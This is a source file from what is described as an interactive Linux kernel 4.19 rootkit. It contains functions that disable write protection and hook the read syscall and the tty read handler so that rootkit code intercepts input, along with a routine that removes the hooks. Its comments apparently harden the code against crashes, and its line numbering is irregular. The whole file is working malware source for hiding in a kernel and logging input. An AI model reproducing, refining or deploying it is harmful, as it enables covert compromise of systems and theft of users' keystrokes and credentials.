linux-rootkit

Feature-rich interactive rootkit that targets Linux kernel 4.19, accompanied by a dynamic kernel memory analysis GDB plugin for in vivo introspection (e.g. using QEMU)



      1 #include <linux/tty.h>
      2 #include <linux/delay.h>
      3 
      4 #include "common.h"
      5 #include "creds.h"
      6 #include "backdoor.h"
      7 #include "read.h"
      8 #include "hook.h"
      9 #include "inputlog.h"
     10 
/*
 * Point the read(2) entry of the syscall table at g7_read.
 *
 * The original handler is not captured here; unbackdoor() restores it from
 * sys_read, which must therefore have been populated elsewhere
 * (presumably in read.c / hook.c — confirm before relying on it).
 * Unlike backdoor_tty(), this function has no "already hooked" guard, so a
 * second call simply re-stores the same pointer.
 *
 * Write protection is dropped only around the single pointer store.
 */
void
backdoor_read(void)
{
    void *hook = (void *)g7_read;

    disable_protection();
    sys_calls[__NR_read] = hook;
    enable_protection();
}
     18 
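/*
 * Replace the ->read handler of the kernel's tty_fops with g7_tty_read,
 * saving the original into sys_tty_read so unbackdoor() can put it back.
 *
 * Idempotent: a non-NULL sys_tty_read means the hook is already installed
 * and the call is a no-op. Without that guard a second call would overwrite
 * the saved pointer with our own hook and the original would be lost.
 *
 * Fix over the previous version: kallsyms_lookup_name() returns 0 when the
 * symbol cannot be resolved (not exported, different kernel build than the
 * 4.19 this targets, ...). The old code dereferenced the result unchecked,
 * which would oops the kernel. The lookup is now done once and checked; on
 * failure nothing is hooked and sys_tty_read stays NULL.
 */
void
backdoor_tty(void)
{
    struct file_operations *fops;

    if (sys_tty_read)
        return;

    fops = (struct file_operations *)kallsyms_lookup_name("tty_fops");
    if (!fops)
        return;

    /* Save the original before we clobber it. */
    sys_tty_read = fops->read;

    /* fops lives in read-only kernel data; drop WP only for the store. */
    disable_protection();
    fops->read = (void *)g7_tty_read;
    enable_protection();
}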
     32 
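/*
 * Remove whichever hook is installed and wait for in-flight calls through
 * it to drain before returning. The caller presumably unloads the module
 * next; returning while some CPU is still inside g7_tty_read()/g7_read()
 * would leave it executing code that is about to be unmapped.
 *
 * Only one path is taken: the tty hook if sys_tty_read is set, otherwise
 * the read(2) syscall hook if sys_read is set. This keeps the original
 * else-if structure. NOTE(review): if both hooks can ever be active at the
 * same time, the read(2) hook is left installed by this function — confirm
 * against the callers of backdoor_read()/backdoor_tty().
 *
 * Fix over the previous version: the tty_fops lookup is checked. If
 * kallsyms_lookup_name() fails there is nothing we can safely restore, so
 * we return (leaving sys_tty_read untouched) instead of dereferencing a
 * NULL file_operations pointer.
 *
 * The msleep() in the drain loops is deliberate: spinning on the atomic
 * counters without yielding would stall the CPU.
 */
void
unbackdoor(void)
{
    if (sys_tty_read) {
        struct file_operations *fops =
            (struct file_operations *)kallsyms_lookup_name("tty_fops");

        if (!fops)
            return;

        disable_protection();
        fops->read = (void *)sys_tty_read;
        enable_protection();

        /* Wait until no reader is still inside g7_tty_read(). */
        while (atomic_read(&tty_read_count) > 0)
            msleep(250);

        sys_tty_read = NULL;
    } else if (sys_read) {
        disable_protection();
        sys_calls[__NR_read] = (void *)sys_read;
        enable_protection();

        /* Wait until no caller is still inside g7_read(). */
        while (atomic_read(&read_count) > 0)
            msleep(250);
    }
}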